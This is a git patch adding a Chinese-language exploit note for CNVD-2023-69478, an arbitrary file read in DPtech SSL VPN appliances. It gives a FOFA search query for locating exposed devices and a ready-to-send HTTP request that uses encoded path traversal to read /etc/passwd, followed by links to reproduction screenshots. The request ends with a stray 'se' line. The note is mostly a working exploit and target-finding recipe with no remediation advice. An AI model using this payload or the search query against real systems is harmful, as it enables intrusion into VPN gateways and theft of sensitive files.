From 6fd3903ba969ad7e577be4839a174fc3bb728fb1 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 16 Nov 2023 19:15:20 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E8=BF=AA=E6=99=AEDPTech=20VPN=20?= =?UTF-8?q?=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 迪普DPTech VPN 任意文件读取.md | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 迪普DPTech VPN 任意文件读取.md diff --git a/迪普DPTech VPN 任意文件读取.md b/迪普DPTech VPN 任意文件读取.md new file mode 100644 index 0000000..6700619 --- /dev/null +++ b/迪普DPTech VPN 任意文件读取.md @@ -0,0 +1,23 @@ +## 迪普DPTech VPN 任意文件读取 CNVD-2023-69478 +杭州迪普科技股份有限公司DPtech SSL VPN存在任意文件读取漏洞,攻击者可利用该漏洞获敏感信息。 + +## 漏洞影响产品 +杭州迪普科技股份有限公司DPtech SSL VPN + +## fofa +``` +title=="SSL VPN Service" && header="Dptech" || cert="DPtechCa" +``` + +## poc +``` +GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 +Host: xxxxxxxxx +Cookie: SSLVPN_lang=1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +se +``` +## 漏洞复现 +![](./assets/780475ed2a4b528fe68184a4f665a7d1fe08f3.png) + +![](./assets/7171140331ad9063b8e9a92e8161c325c0b418.png)